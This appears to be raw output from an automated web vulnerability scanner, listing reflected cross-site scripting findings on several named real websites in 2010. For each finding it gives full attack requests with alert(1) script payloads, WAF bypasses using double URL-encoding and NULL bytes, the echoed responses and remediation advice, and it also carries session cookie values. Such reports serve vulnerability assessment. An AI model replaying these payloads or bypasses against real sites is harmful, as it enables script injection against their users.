GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3Df4478'-alert(1)-'ea244a6685e HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10435 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 29 Nov 2010 17:01:14 GMT
The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf7d3</script><script>alert(1)</script>1b44593dcf8 was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3Dcf7d3</script><script>alert(1)</script>1b44593dcf8 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 11138 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 29 Nov 2010 17:01:13 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f36ee'%3bc912024fbc2 was submitted in the REST URL parameter 4. This input was echoed as f36ee';c912024fbc2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /COM/iview/245726341/http:f36ee'%3bc912024fbc2/ads.bluelithium.com/clk HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7207 Content-Type: text/html Expires: 0 Connection: close Date: Mon, 29 Nov 2010 17:16:22 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75cff<script>alert(1)</script>312333520f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php75cff<script>alert(1)</script>312333520f9 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 29 Nov 2010 16:46:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=f1bbp0rhdgtqpb8sms484e65k5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php75cff<script>alert(1)</script>312333520f9</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47262"-alert(1)-"fed9ac5aab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php47262"-alert(1)-"fed9ac5aab5 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 29 Nov 2010 16:46:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ioqvsop0i6c01q0mi5unhpk7j0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php47262"-alert(1)-"fed9ac5aab5"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.107. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ead"-alert(1)-"2cf875222dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/c7ead"-alert(1)-"2cf875222dd HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:46:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/c7ead"-alert(1)-"2cf875222dd"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2730"%20style%3dx%3aexpression(alert(1))%20c264a0aa9c5 was submitted in the pub parameter. This input was echoed as c2730\" style=x:expression(alert(1)) c264a0aa9c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?pub=vanityfairc2730"%20style%3dx%3aexpression(alert(1))%20c264a0aa9c5&url=http%3a%2f%2fwww.vanityfair.com%252Fservices%252Fprivacypolicy&title=+Privacy+Policy%3a+vanityfair.com HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:17:55 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88693
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="vanityfairc2730\" style=x:expression(alert(1)) c264a0aa9c5" /> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c56bc98269 was submitted in the url parameter. This input was echoed as be8cf"><script>alert(1)</script>8c56bc98269 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bookmark.php?pub=vanityfair&url=http%3a%2f%2fwww.vanityfair.com%252Fservices%252Fprivacypolicybe8cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c56bc98269&title=+Privacy+Policy%3a+vanityfair.com HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:18:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88544
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.vanityfair.com/services/privacypolicybe8cf"><script>alert(1)</script>8c56bc98269" /> ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 33f95%253ca%2520b%253dc%253ea71e09fee51 was submitted in the url parameter. This input was echoed as 33f95<a b=c>a71e09fee51 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bookmark.php?pub=vanityfair&url=http%3a%2f%2fwww.vanityfair.com%252Fservices%252Fprivacypolicy33f95%253ca%2520b%253dc%253ea71e09fee51&title=+Privacy+Policy%3a+vanityfair.com HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:18:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <span class="link">http://www.vanityfair.com/services/privacypolicy33f95<a b=c>a71e09fee51</span> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9f6"><script>alert(1)</script>520ec690520 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /anger-management-Vermont.php/x22ac9f6"><script>alert(1)</script>520ec690520 HTTP/1.1 Host: www.angermanagementusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:21:38 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Anger Ma ...[SNIP]... <form id="contacts-form" method="post" action="/anger-management-Vermont.php/x22ac9f6"><script>alert(1)</script>520ec690520" onSubmit="return check_contact_form('contacts-form')"> ...[SNIP]...
The value of the cntry request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d61ec'-alert(1)-'64162f0bd181d3ace was submitted in the cntry parameter. This input was echoed as d61ec'-alert(1)-'64162f0bd181d3ace in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the state request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %008bae0'-alert(1)-'dacd26ff9cd was submitted in the state parameter. This input was echoed as 8bae0'-alert(1)-'dacd26ff9cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Billing Address at The Cond. Nast Store - Error(s) on page</tit ...[SNIP]... ate(document.getElementById('statelistbox'),document.getElementById('statetextbox'),document.getElementById('statelist'),'United States'); setDropDownDefault(document.getElementById("statelist"), '%008bae0'-alert(1)-'dacd26ff9cd'); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad982<script>alert(1)</script>0ce4eedbac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /entrad982<script>alert(1)</script>0ce4eedbac4/states/massachusetts.html HTTP/1.1 Host: www.divorce4her.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 29 Nov 2010 17:22:12 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 1616
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <title>Page Not Available</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD> <BODY bg ...[SNIP]... <br> 174.122.23.218 tried to load www.divorce4her.com/entrad982<script>alert(1)</script>0ce4eedbac4/states/massachusetts.html <br> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f0e1<script>alert(1)</script>11c6447f120 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /entr/states6f0e1<script>alert(1)</script>11c6447f120/massachusetts.html HTTP/1.1 Host: www.divorce4her.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 29 Nov 2010 17:22:13 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 1616
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <title>Page Not Available</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD> <BODY bg ...[SNIP]... <br> 174.122.23.218 tried to load www.divorce4her.com/entr/states6f0e1<script>alert(1)</script>11c6447f120/massachusetts.html <br> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66e25<script>alert(1)</script>1dc83bd1013 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /entr/states/massachusetts.html66e25<script>alert(1)</script>1dc83bd1013 HTTP/1.1 Host: www.divorce4her.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 29 Nov 2010 17:22:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 1616
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <title>Page Not Available</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD> <BODY bg ...[SNIP]... <br> 174.122.23.218 tried to load www.divorce4her.com/entr/states/massachusetts.html66e25<script>alert(1)</script>1dc83bd1013 <br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66a83'%3b599030adafd was submitted in the REST URL parameter 1. This input was echoed as 66a83';599030adafd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women-of-the-year66a83'%3b599030adafd/ HTTP/1.1 Host: www.glamour.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mobify=0;
Response
HTTP/1.1 404 Not Found Server: Resin/3.1.6 Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:32:49 GMT Date: Mon, 29 Nov 2010 17:22:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49487
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1 ...[SNIP]... <!--
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cdc9d<img%20src%3da%20onerror%3dalert(1)>e4fdf758ccb was submitted in the REST URL parameter 1. This input was echoed as cdc9d<img src=a onerror=alert(1)>e4fdf758ccb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /women-of-the-yearcdc9d<img%20src%3da%20onerror%3dalert(1)>e4fdf758ccb/ HTTP/1.1 Host: www.glamour.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mobify=0;
Response
